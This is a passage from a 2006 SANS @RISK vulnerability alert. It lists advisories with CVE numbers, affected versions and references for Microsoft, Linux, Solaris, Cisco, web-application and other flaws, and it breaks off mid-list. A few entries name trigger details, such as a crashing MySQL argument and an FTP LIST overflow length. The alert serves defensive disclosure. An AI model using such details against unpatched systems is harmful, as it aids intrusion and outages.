@RISK: The Consensus Security Vulnerability Alert

Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com)

Widely Deployed Software

• (1) HIGH: Oracle Critical Patch Update July 2006
• (2) HIGH: Internet Explorer WebViewFolderICon ActiveX Control Memory Corruption (0-day)

Other Software

• (3) HIGH: Cisco MARS Multiple Vulnerabilities
• (4) HIGH: Wireshark Ethereal Multiple Protocol Decoding Vulnerabilities

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)

Microsoft Office

• 06.29.1 - Microsoft Powerpoint Multiple Unspecified Vulnerabilities
• 06.29.2 - Microsoft Powerpoint Multiple Unspecified Vulnerabilities

Other Microsoft Products

• 06.29.3 - Internet Explorer WebViewFolderIcon Denial of Service
• 06.29.4 - Internet Explorer DXImageTransform Properties Denial of Service
• 06.29.5 - Microsoft Works Spreadsheet Multiple Remote Vulnerabilties
• 06.29.6 - Microsoft Internet Explorer MHTMLFile Denial of Service
• 06.29.7 - Internet Explorer DataSourceControl Denial of Service
• 06.29.8 - Internet Explorer OVCtl Denial of Service
• 06.29.9 - Internet Explorer Content-Type Denial of Service

Third Party Windows Apps

• 06.29.10 - RARLAB WinRAR LHA Filename Handling Buffer Overflow
• 06.29.11 - Outpost Firewall PRO Local Privilege Escalation
• 06.29.12 - Agnitum Outpost Firewall FiltNT.SYS Local Denial of Service
• 06.29.13 - Symantec Norton Personal Firewall Registry Access Denial of Service
• 06.29.14 - Sunbelt Kerio Personal Firewall CreateRemoteThread Denial of Service
• 06.29.15 - VisNetic Mail Server Multiple File Include Vulnerabilities
• 06.29.16 - Rabox WinLPD Remote Buffer Overflow
• 06.29.17 - Lavasoft Personal Firewall Local Privilege Escalation
• 06.29.18 - Lotus Notes Mail Recipient Information Disclosure
• 06.29.19 - Various Citrix Applications MFEvent.DLL Privilege Escalation
• 06.29.20 - PCAnywhere CIF Files Local Privilege Escalation
• 06.29.21 - Intervations FileCopa LIST Command Remote Buffer Overflow
• 06.29.22 - Quick 'n Easy FTP Server LIST Command Buffer Overflow

Linux

• 06.29.23 - Linux Kernel USB Driver Data Queue Local Denial of Service
• 06.29.24 - Linux Kernel PROC Filesystem Local Privilege Escalation
• 06.29.25 - Debian GNU/Linux Rssh Security Bypass
• 06.29.26 - Rocks Clusters Local Privilege Escalation Vulnerabilities

Solaris

• 06.29.27 - Sun Solaris 10 Kernel Patches Denial of Service
• 06.29.28 - Solaris Kernel Debugger KMDB(1) Local Denial of Service
• 06.29.29 - Sun Solaris Event Port API Denial of Service
• 06.29.30 - Solaris Net Mount Point Denial of Service

Cross Platform

• 06.29.31 - MySQL Server Date_Format Denial of Service
• 06.29.32 - DUMB Impulse Tracker Files Remote Heap Buffer Overflow
• 06.29.33 - McAfee EPolicy Orchestrator Framework Service Directory Traversal
• 06.29.34 - Mercury Messenger Users Directory Information Disclosure
• 06.29.35 - OpenVMS Unspecified Local Denial of Service
• 06.29.36 - Asterisk IAX2 Request Flood Remote Denial of Service
• 06.29.37 - Zoho Virtual Office Message HTML Injection
• 06.29.38 - Oracle July 2006 Security Update Multiple Vulnerabilities
• - - Wireshark Protocol Dissectors Multiple Vulnerabilities
• 06.29.40 - VMware Information Disclosure
• 06.29.41 - Gnu GCC FastJar Archive Extraction Directory Traversal
• 06.29.42 - Cisco Security Monitoring Analysis and Response System Multiple Vulnerabilities
• 06.29.43 - Cisco Security Monitoring Analysis and Response System JBoss Command Execution
• 06.29.44 - Sybase Financial Fusion Server Unspecified Security Vulnerability

Web Application - Cross Site Scripting

• 06.29.45 - Plesk Control Panel File_Manager.PHP Cross-Site Scripting
• 06.29.46 - Loudblog Index.PHP Cross-Site Scripting
• 06.29.47 - OWASP WebScarab Cross-Site Scripting
• 06.29.48 - Paddelberg Top XL Multiple Cross-Site Scripting Vulnerabilities

Web Application - SQL Injection

• 06.29.49 - Invision Power Board IPSClass.PHP SQL Injection
• 06.29.50 - MyBB Client-IP SQL Injection
• 06.29.51 - Professional Home Page Tools Guestbook Multiple SQL Injection Vulnerabilities
• 06.29.52 - Francisco Charrua Photo-Gallery Room.PHP SQL Injection
• 06.29.53 - Eskolar CMS Multiple SQL Injection Vulnerabilities
• 06.29.54 - GeodesicSolutions Products Multiple SQL Injection Vulnerabilities

Web Application

• 06.29.55 - Mail2Forum Multiple Remote File Include Vulnerabilities
• 06.29.56 - ExtCalendar For Mambo ExtCalendar.php Remote File Include
• 06.29.57 - LoudMouth Module For Mambo ABBC.Class.PHP Remote File Include
• 06.29.58 - osDate Multiple HTML Injection Vulnerabilities
• 06.29.59 - pollxt Module For Mambo Conf.Pollxt.PHP Remote File Include Vulnerability
• 06.29.60 - Calendar Module For Mambo Com_Calendar.PHP Remote File Include
• 06.29.61 - Subberz Lite UserFunc Remote File Include
• 06.29.62 - Sitemap.XML.PHP Remote File Include
• 06.29.63 - MiniBB Multiple Remote File Include Vulnerabilities
• 06.29.64 - IceWarp Web Mail Multiple File Include Vulnerabilities
• 06.29.65 - ListMessenger LM_Path Parameter Remote File Include
• 06.29.66 - FlushCMS Class.Rich.PHP Remote File Include
• 06.29.67 - HTMLArea3 Addon For Mambo Config.Inc.PHP Remote File Include
• 06.29.68 - VideoDB Component Module For Mambo Xml_Domit_Lite_Include.PHP Remote File Include
• 06.29.69 - PHP-Post Logincookie Remote Authentication Bypass
• 06.29.70 - DeluxeBB Multiple Input Validation Vulnerabilities
• 06.29.71 - hdweGUEST Multiple HTML Injection Vulnerabilities
• 06.29.72 - ToendaCMS Connector.PHP Arbitrary File Upload
• 06.29.73 - AFCommerce Shopping Cart Multiple Input Validation Vulnerabilities
• 06.29.74 - IDevSpot PHPLinkExchange Index.PHP Remote File Include
• 06.29.75 - IDevSpot PHPHostBot Index.PHP Remote File Include
• 06.29.76 - Chipmunk Guestbook AddEntry.PHP HTML Injection
• 06.29.77 - IManage Absolute_Path Multiple File Include Vulnerabilities
• 06.29.78 - SiteDepth CMS Constants.PHP Remote File Include

Network Device

• 06.29.79 - BT Voyager Multiple Remote Authentication Bypass Vulnerabilities
• 06.29.80 - Cisco Security Monitoring Analysis and Response System Information Disclosure
• 06.29.81 - Cisco Security Monitoring Analysis and Response System Multiple Privilege Escalation Vulnerabilities

Hardware

• 06.29.82 - Multiple D-Link Routers UPNP Buffer Overflow

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar and Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 29, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5088 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

• 06.29.1 - CVE: Not Available
• Platform: Microsoft Office
• Title: Microsoft Powerpoint Multiple Unspecified Vulnerabilities
• Description: Microsoft PowerPoint is prone to multiple remote vulnerabilities. Please check the attached advisory for details. Microsoft PowerPoint 2003 is affected.
• Ref: http://www.securityfocus.com/bid/18993/info

• 06.29.2 - CVE: CVE-2006-3655, CVE-2006-3656, CVE-2006-3660
• Platform: Microsoft Office
• Title: Microsoft Powerpoint Multiple Unspecified Vulnerabilities
• Description: Microsoft PowerPoint is prone to multiple remote vulnerabilities which may allow remote attackers to cause crashes, or to execute arbitrary machine code in the context of the affected application. PowerPoint versions 2003 and prior are reported to be vulnerable.
• Ref: http://www.securityfocus.com/bid/18993

• 06.29.3 - CVE: CVE-2006-3730
• Platform: Other Microsoft Products
• Title: Internet Explorer WebViewFolderIcon Denial of Service
• Description: Internet Explorer is prone to a denial of service issue when the browser processes a malicious "WebViewFolderIcon" object. Microsoft Internet Explorer versions 6.0 SP1 and 6.0 are vulnerable. Ref: http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html

• 06.29.4 - CVE: Not Available
• Platform: Other Microsoft Products
• Title: Internet Explorer DXImageTransform Properties Denial of Service
• Description: Internet Explorer is prone to a denial of service issue which exists at the "StartColorStr" and "EndColorStr" properties of the "DXImageTransform.Microsoft.Gradient" ActiveX object. Internet Explorer 6 SP2 is affected. Ref: http://browserfun.blogspot.com/2006/07/mobb-17-gradient-startcolorstr.html

• 06.29.5 - CVE: CVE-2006-2492,CVE-2006-3653,CVE-2006-3654
• Platform: Other Microsoft Products
• Title: Microsoft Works Spreadsheet Multiple Remote Vulnerabilties
• Description: Microsoft Works is vulnerable to multiple unspecified buffer overflow issues when it attempts to import malicious files. Microsoft Works version 8.0 is vulnerable.
• Ref: http://www.frsirt.com/english/advisories/2006/2813

• 06.29.6 - CVE: Not Available
• Platform: Other Microsoft Products
• Title: Microsoft Internet Explorer MHTMLFile Denial of Service
• Description: Internet Explorer is exposed to a denial of service issue. The problem occurs when the application is used to view a malicious URI or web page consisting of a malformed MHTMLfile element. Internet Explorer version 6 SP2 is affected.
• Ref: http://www.securityfocus.com/bid/19013

• 06.29.7 - CVE: Not Available
• Platform: Other Microsoft Products
• Title: Internet Explorer DataSourceControl Denial of Service
• Description: Internet Explorer is prone to a denial of service issue in the "getDataMemberName()" properties of the "DataSourceControl" ActiveX control object. Internet Explorer 6 SP2 is affected. Ref: http://browserfun.blogspot.com/2006/07/mobb-19-datasourcecontrol.html

• 06.29.8 - CVE: Not Available
• Platform: Other Microsoft Products
• Title: Internet Explorer OVCtl Denial of Service
• Description: Microsoft Internet Explorer is prone to a denial of service issue which is triggered when the browser processes the "NewDefaultItem" method of the "OVCtl" object. All current versions are affected. Ref: http://browserfun.blogspot.com/2006/07/mobb-20-ovctl-newdefaultitem.html

• 06.29.9 - CVE: Not Available
• Platform: Other Microsoft Products
• Title: Internet Explorer Content-Type Denial of Service
• Description: Microsoft Internet Explorer is prone to a denial of service vulnerability. The vulnerability presents itself when the browser processes excessively large "Content-Type" HTTP response headers consisting of more than approximately 1M bytes. This crash reportedly occurs due to a flaw in the "wininet.dll" library.
• Ref: http://www.securityfocus.com/bid/19092

• 06.29.10 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: RARLAB WinRAR LHA Filename Handling Buffer Overflow
• Description: RARLAB WinRAR is a compression utility capable of reading and writing files using several different archival formats. It is susceptible to a remote buffer overflow vulnerability, which is caused by a failure of the application to properly bounds check user-supplied input prior to copying it to an insufficiently-sized memory buffer. Versions from 3.0 to 3.60 beta 6 are reported as vulnerable.
• Ref: http://www.securityfocus.com/bid/19043

• 06.29.11 - CVE: CVE-2006-3697
• Platform: Third Party Windows Apps
• Title: Outpost Firewall PRO Local Privilege Escalation
• Description: Outpost Firewall PRO is a firewall application. It is vulnerable to a local privilege escalation issue when the application fails to drop SYSTEM level privileges when spawning a child process. Outpost Firewall Pro versions 3.51.759.6511 (462) and earlier are vulnerable.
• Ref: http://www.ben.goulding.com.au/secad.html

• 06.29.12 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Agnitum Outpost Firewall FiltNT.SYS Local Denial of Service
• Description: Outpost Firewall is a Win32 personal firewall suite developed by Agnitum. Outpost Firewall is prone to a local denial of service vulnerability. The problem occurs in "filtnt.sys" when handling specially malformed input data. Outpost Firewall Pro version 3.5.631 is affected by this issue.
• Ref: http://www.securityfocus.com/archive/1/440427

• 06.29.13 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Symantec Norton Personal Firewall Registry Access Denial of Service
• Description: Symantec Norton Personal Firewall is prone to a denial of service vulnerability. This issue occurs when a program calls certain API calls for manipulating the Windows Registry on Norton service registry keys. Norton Personal Firewall 2006 version 9.1.0.33 is affected.
• Ref: http://www.securityfocus.com/bid/18995

• 06.29.14 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Sunbelt Kerio Personal Firewall CreateRemoteThread Denial of Service
• Description: Sunbelt Kerio Personal Firewall is prone to a denial of service issue which occurs when a program calls the CreateRemoteThread Windows API call. This call is hooked by the application in every user mode process. Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912 are affected. Ref: http://www.matousec.com/info/advisories/Kerio-Terminating-kpf4ss-exe-using-internal-runtime-error.php

• 06.29.15 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: VisNetic Mail Server Multiple File Include Vulnerabilities
• Description: VisNetic Mail Server is prone to multiple remote file include vulnerabilities and a local file include vulnerability because the application fails to properly sanitize user-supplied input. VisNetic Mail Server version 8.3.5 is affected.
• Ref: http://www.securityfocus.com/bid/19002

• 06.29.16 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Rabox WinLPD Remote Buffer Overflow
• Description: Rabox Winlpd provides LPD print-server support and LPR print-client support. It is affected by a remote buffer overflow issue due to insufficient sanitization of user-supplied data. Winlpd version 1.2, build 1076 is affected.
• Ref: http://www.securityfocus.com/bid/19011

• 06.29.17 - CVE: CVE-2006-3697
• Platform: Third Party Windows Apps
• Title: Lavasoft Personal Firewall Local Privilege Escalation
• Description: Lavasoft Personal Firewall is a firewall for Windows. The application can allow local attackers to gain elevated privileges. This issue arises because the application fails to drop SYSTEM level privileges when spawning a child process, specifically an open folder control window. Version 1.0.543.5722 (433) is reported to be vulnerable.
• Ref: http://www.ben.goulding.com.au/secad.html

• 06.29.18 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Lotus Notes Mail Recipient Information Disclosure
• Description: Lotus Notes is an email client that is available for Microsoft Windows. It is exposed to an information disclosure issue. Please refer to the link below for further details. IBM Lotus Notes versions 7.0.1 and earlier are affected.
• Ref: http://www-1.ibm.com/support/docview.wss?rs=899&uid=swg21240386

• 06.29.19 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Various Citrix Applications MFEvent.DLL Privilege Escalation
• Description: Various Citrix applications contain an error that allows an authenticated user to escalate privileges. Citrix Metaframe, Citrix MetaFrame Presentation Server and Citrix Presentation Server are affected.
• Ref: http://www.securityfocus.com/bid/19056/info

• 06.29.20 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: PCAnywhere CIF Files Local Privilege Escalation
• Description: PCAnywhere is a remote control and management application. It is affected by a local privilege escalation issue because the application fails to secure access to "CIF (Caller)" files. PCAnywhere version 12.5 is affected.
• Ref: http://www.securityfocus.com/bid/19059

• 06.29.21 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Intervations FileCopa LIST Command Remote Buffer Overflow
• Description: FileCopa FTP Server is a file transfer application designed for use on Microsoft Windows computers. FileCopa is prone to a buffer overflow vulnerability when handling data through the LIST command. Reportedly, passing 350 bytes of data may overflow a finite sized internal memory buffer. Version 1.01 of the software is vulnerable.
• Ref: http://www.appsec.ch/docs/2006-07-19-fileCopa.txt

• 06.29.22 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Quick 'n Easy FTP Server LIST Command Buffer Overflow
• Description: Quick 'n Easy FTP Server is prone to a buffer overflow vulnerability. Excessively long arguments to the LIST command may result in an overflow condition. An attacker can exploit this issue to execute arbitrary machine code in the context of the affected server application. This likely occurs with SYSTEM level privileges. Quick And Easy FTP Server version 3.0.2 is affected.
• Ref: http://www.securityfocus.com/bid/19067

• 06.29.23 - CVE: Not Available
• Platform: Linux
• Title: Linux Kernel USB Driver Data Queue Local Denial of Service
• Description: The Linux kernel is vulnerable to a local denial of service issue due to a design error with the USB FTDI SIO driver. The code "drivers/usb/serial/ftdi_sio.c" imposes no limit on the amount of data that can be written to the serial port. Linux kernel versions 2.6.x are vulnerable.
• Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.27

• 06.29.24 - CVE: Not Available
• Platform: Linux
• Title: Linux Kernel PROC Filesystem Local Privilege Escalation
• Description: The Linux kernel is susceptible to a local privilege escalation issue due to a race condition in the "proc" filesystem. The exploit demonstrating this issue accesses "/proc/*/environ" files, setting setuid permissions. The 2.6 series of the Linux kernel is vulnerable to this issue.
• Ref: http://www.securityfocus.com/bid/18992

• 06.29.25 - CVE: CVE-2006-1320
• Platform: Linux
• Title: Debian GNU/Linux Rssh Security Bypass
• Description: rssh is a shell that restricts users to utilizing scp or sftp. The Debian GNU/Linux rssh package contains a programming error in "util.c" which allows a bypass of security controls. Additionally, this vulnerability can be used to pass -e options to CVS. The error allows for execution of cvs directly and the security mechanisms normally controlling -e options will be circumvented. Debian rssh version 2.3.0-1 is affected.
• Ref: http://www.securityfocus.com/bid/18999

• 06.29.26 - CVE: CVE-2006-3693
• Platform: Linux
• Title: Rocks Clusters Local Privilege Escalation Vulnerabilities
• Description: Rocks Clusters is a clustering solution for the x86 and IA64 versions of the Redhat Linux operating system. It is susceptible to multiple local privilege escalation issues due to insufficient sanitization of user-supplied input. Rocks Clusters versions 4.1 and earlier are affected.
• Ref: http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt

• 06.29.27 - CVE: Not Available
• Platform: Solaris
• Title: Sun Solaris 10 Kernel Patches Denial of Service
• Description: Sun Solaris 10 is vulnerable to a denial of service vulnerability. Solaris 10 with kernel patches 118822-29 or later for SPARC and 118844-29 or later for x86 are reported as vulnerable. Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102344-1&searchclause=

• 06.29.28 - CVE: CVE-2006-3728
• Platform: Solaris
• Title: Solaris Kernel Debugger KMDB(1) Local Denial of Service
• Description: Solaris is vulnerable to a local unspecified denial of service issue when the kernel debugger kmdb(1) is loaded. Sun Solaris x86 version 10 is vulnerable.
• Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102344-1

• 06.29.29 - CVE: Not Available
• Platform: Solaris
• Title: Sun Solaris Event Port API Denial of Service
• Description: Sun Solaris is prone to a local denial of service vulnerability, the cause of which is currently unknown. An attacker may execute an application that employs the event port API in a manner that causes a system panic. Solaris version 10.0 is reported as vulnerable. Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102286-1&searchclause=

• 06.29.30 - CVE: Not Available
• Platform: Solaris
• Title: Solaris Net Mount Point Denial of Service
• Description: Solaris is vulnerable to an unspecified denial of service issue with the "/net" mount point. Sun Solaris versions 10 and 10 x86 with autofs service enabled are vulnerable. Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102286-1&searchclause=

• 06.29.31 - CVE: Not Available
• Platform: Cross Platform
• Title: MySQL Server Date_Format Denial of Service
• Description: MySQL is susceptible to a remote denial of service vulnerability because the database server fails if the "select date_format" SQL function is called with "('%d%s', 1);" argument. MySQL versions prior to 4.1.18, 5.0.19 and 5.1.6 are affected.
• Ref: http://www.securityfocus.com/bid/19032

• 06.29.32 - CVE: Not Available
• Platform: Cross Platform
• Title: DUMB Impulse Tracker Files Remote Heap Buffer Overflow
• Description: DUMB is an IT, XM, S3M and MOD player library. It contains a heap overflow vulnerability that is caused by the software's failure to properly bounds check user-supplied input before copying it to an insufficiently sized memory buffer. Versions 0.9.3 and prior are reported as vulnerable.
• Ref: http://www.securityfocus.com/bid/19025

• 06.29.33 - CVE: Not Available
• Platform: Cross Platform
• Title: McAfee EPolicy Orchestrator Framework Service Directory Traversal
• Description: McAfee ePolicy Orchestrator is prone to a remote directory traversal vulnerability. This vulnerability exists in the Framework service component of the EPO management console. This situation arises as users are able to submit file and directory names followed by the name of an XML file; however the application does not properly sanitize this data. Versions of the software from 1.0 through 3.5 are vulnerable.
• Ref: http://www.eeye.com/html/research/advisories/AD20060713.html

• 06.29.34 - CVE: Not Available
• Platform: Cross Platform
• Title: Mercury Messenger Users Directory Information Disclosure
• Description: Mercury Messenger is a chat application. It is affected by an information disclosure issue because it fails to properly set permissions on the "/Users" directory and files within this directory. All current versions are affected.
• Ref: http://www.securityfocus.com/bid/19005

• 06.29.35 - CVE: Not Available
• Platform: Cross Platform
• Title: OpenVMS Unspecified Local Denial of Service
• Description: OpenVMS is a mainframe like operating system. It is prone to an unspecified local denial of service vulnerability in version 7.3-2.
• Ref: http://www.securityfocus.com/bid/19008

• 06.29.36 - CVE: Not Available
• Platform: Cross Platform
• Title: Asterisk IAX2 Request Flood Remote Denial of Service
• Description: Asterisk is a private branch exchange (PBX) application. It is susceptible to a remote denial of service vulnerability. The software is unable to efficiently handle numerous unauthenticated call requests. Asterisk versions prior to 1.2.10 are vulnerable to this issue.
• Ref: http://www.securityfocus.com/bid/19009

• 06.29.37 - CVE: Not Available
• Platform: Cross Platform
• Title: Zoho Virtual Office Message HTML Injection
• Description: Zoho Virtual Office is a collaboration suite available for Microsoft Windows and Linux. It is prone to an HTML injection vulnerability, due to a failure to properly sanitize user-supplied input before using it in dynamically generated content. Versions 3.2 Build 3210 and prior are reported as vulnerable.
• Ref: http://www.securityfocus.com/bid/19016

• 06.29.38 - CVE: Not Available
• Platform: Cross Platform
• Title: Oracle July 2006 Security Update Multiple Vulnerabilities
• Description: Various Oracle applications including Oracle Database, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite and Applications, Oracle Pharmaceutical Applications, Oracle Enterprise Manager, Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne are affected by multiple vulnerabilities. Please refer to the Oracle advisory for details. Ref: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html

• - - CVE: CVE-2006-3627 CVE-2006-3632
• Platform: Cross Platform
• Title: Wireshark Protocol Dissectors Multiple Vulnerabilities
• Description: Wireshark is a network packet analyzer and the successor to Ethereal. It is prone to multiple vulnerabilities which may permit attackers to execute arbitrary code, which can facilitate a compromise of an affected computer or cause a denial of service condition to legitimate users of the application. Versions 0.99.1 and prior are reported as vulnerable.
• Ref: http://www.wireshark.org/security/wnpa-sec-2006-01.html

• 06.29.40 - CVE: CVE-2006-3589
• Platform: Cross Platform
• Title: VMware Information Disclosure
• Description: VMware is a set of server emulation applications. It is vulnerable to an information disclosure issue due to insecure permissions being set on SSL key and certificate files. Vmware Player for Linux, VMware Workstation for Linux, VMware Server for Linux and VMware Infrastructure 3 are vulnerable.
• Ref: http://kb.vmware.com/kb/2467205

• 06.29.41 - CVE: Not Available
• Platform: Cross Platform
• Title: Gnu GCC FastJar Archive Extraction Directory Traversal
• Description: FastJar is an implementation of the popular jar utility. The gnu gcc implementation of Fastjar is exposed to a directory traversal issue due to insufficient sanitization of user-supplied data. GNU gcc versions 4.1 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/19070

• 06.29.42 - CVE: Not Available
• Platform: Cross Platform
• Title: Cisco Security Monitoring Analysis and Response System Multiple Vulnerabilities
• Description: Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that correlates and analyzes data in event logs received from various network devices. It is affected by multiple information disclosure, command execution and privilege escalation issues. Cisco has released version 4.2.1 to address these issues.
• Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

• 06.29.43 - CVE: Not Available
• Platform: Cross Platform
• Title: Cisco Security Monitoring Analysis and Response System JBoss Command Execution
• Description: Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that correlates and analyzes data in event logs received from various network devices. It is prone to a vulnerability that could permit the execution of arbitrary commands. This issue occurs because the JBoss web application server may allow a remote unauthenticated user to execute arbitrary shell commands with the privileges of the CS-MARS administrator. Cisco has released CS-MARS version 4.2.1 to address this issue.
• Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

• 06.29.44 - CVE: Not Available
• Platform: Cross Platform
• Title: Sybase Financial Fusion Server Unspecified Security Vulnerability
• Description: Sybase Financial Fusion Server is an e-financial solution. It is affected by an unspecified issue in the Consumer Banking Suite. Please refer to the referenced advisory for details.
• Ref: http://www.securityfocus.com/bid/19076

• 06.29.45 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Plesk Control Panel File_Manager.PHP Cross-Site Scripting
• Description: Plesk Control Panel is an online control panel implemented in PHP. It is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the "file" parameter of the "filemanager.php" script. Versions 8.0.0 and prior are affected.
• Ref: http://www.securityfocus.com/bid/19017

• 06.29.46 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Loudblog Index.PHP Cross-Site Scripting
• Description: Loudblog is a content management application. It is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the "page" parameter of the "index.php" script. Versions prior to 0.5 are affected.
• Ref: http://loudblog.de/forum/viewtopic.php?id=756

• 06.29.47 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: OWASP WebScarab Cross-Site Scripting
• Description: OWASP WebScarab is a framework used in testing applications that utilize the HTTP and HTTPS protocols. It is prone to a cross-site scripting vulnerability because it fails to sanitize HTML and script code from URI input. OWASP WebScarab version 2006.6.21 0003 is affected.
• Ref: http://www.securityfocus.com/bid/19063

• 06.29.48 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Paddelberg Top XL Multiple Cross-Site Scripting Vulnerabilities
• Description: Paddelberg Top XL is a topsite script. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to various scripts. Paddelberg Top XL versions 1.1 and earlier are vulnerable.
• Ref: http://www.securityfocus.com/bid/19098

• 06.29.49 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Invision Power Board IPSClass.PHP SQL Injection
• Description: Invision Power Board is a web-based bulletin board. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "HTTP_CLIENT_IP" parameter of the "ipsclass.php" script. Invision Board versions 2.1.6 and earlier are vulnerable.
• Ref: http://www.securityfocus.com/bid/18984

• 06.29.50 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: MyBB Client-IP SQL Injection
• Description: MyBB is a bulletin-board application. It is exposed to an SQL injection issue due to insufficient sanitization of user-supplied input. MyBulletinBoard versions 1.1.5 and earlier are affected.
• Ref: http://www.securityfocus.com/archive/1/440163

• 06.29.51 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Professional Home Page Tools Guestbook Multiple SQL Injection Vulnerabilities
• Description: Professional PHP Tools Guestbook is a web-based guestbook application. It is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input to various scripts. All current versions are vulnerable.
• Ref: http://www.securityfocus.com/bid/19019

• 06.29.52 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Francisco Charrua Photo-Gallery Room.PHP SQL Injection
• Description: Francisco Charrua Photo-Gallery is a web-based photo-gallery application. Insufficient sanitization of the "id" parameter in the "Room.php" script exposes the application to an SQL injection issue. Photo-Gallery version 1.0 is affected.
• Ref: http://www.securityfocus.com/bid/19020

• 06.29.53 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Eskolar CMS Multiple SQL Injection Vulnerabilities
• Description: Eskolar CMS is a web-based content management application. It is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input to multiple scripts. CMS version 0.9 0 is affected.
• Ref: http://www.securityfocus.com/bid/19045

• 06.29.54 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: GeodesicSolutions Products Multiple SQL Injection Vulnerabilities
• Description: GeodesicSolutions GeoAuctions Enterprise and Premier are web-based auction applications. Insufficient sanitization of user-supplied input exposes the applications to multiple SQL injection issues. All current versions of the software are affected.
• Ref: http://www.securityfocus.com/bid/19093

• 06.29.55 - CVE: Not Available
• Platform: Web Application
• Title: Mail2Forum Multiple Remote File Include Vulnerabilities
• Description: Mail2Forum is a web-based mailing list addon to phpBB classified ads system. It is affected by multiple remote file include issues due to insufficient sanitization of the "m2f_root_path" parameter of multiple php scripts. All current versions are affected.
• Ref: http://www.securityfocus.com/bid/19038

• 06.29.56 - CVE: Not Available
• Platform: Web Application
• Title: ExtCalendar For Mambo ExtCalendar.php Remote File Include
• Description: ExtCalendar is a module for a content management system called Mambo. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" parameter in the "extcalendar.php" script. ExtCalendar versions 2.0 and earlier are vulnerable.
• Ref: http://www.securityfocus.com/bid/19042

• 06.29.57 - CVE: Not Available
• Platform: Web Application
• Title: LoudMouth Module For Mambo ABBC.Class.PHP Remote File Include
• Description: LoudMouth is a module for Mambo. The module is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the "abbc.class.php" script. This issue affects version 4.0j.
• Ref: http://www.securityfocus.com/bid/19044

• 06.29.58 - CVE: Not Available
• Platform: Web Application
• Title: osDate Multiple HTML Injection Vulnerabilities
• Description: osDate is an online dating system. It is prone to multiple HTML injection vulnerabilities due to improper sanitization of user-supplied input to the "txtcomment" and the "date" input boxes in the comments page. osDate version 1.1.7 is vulnerable.
• Ref: http://www.securityfocus.com/bid/19034

• 06.29.59 - CVE: Not Available
• Platform: Web Application
• Title: pollxt Module For Mambo Conf.Pollxt.PHP Remote File Include Vulnerability
• Description: pollxt is a module for Mambo. The module is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" parameter of the "conf.pollxt.php" script. pollxt versions 1.22.07 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/19037

• 06.29.60 - CVE: Not Available
• Platform: Web Application
• Title: Calendar Module For Mambo Com_Calendar.PHP Remote File Include
• Description: Calendar Module for Mambo is a Calendar Plugin for Mambo. Mambo Calendar Module is vulnerable to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the "absolute_path" parameter of the "com_article.php" script. This issue affects version 1.5.7.
• Ref: http://www.securityfocus.com/archive/1/440407

• 06.29.61 - CVE: Not Available
• Platform: Web Application
• Title: Subberz Lite UserFunc Remote File Include
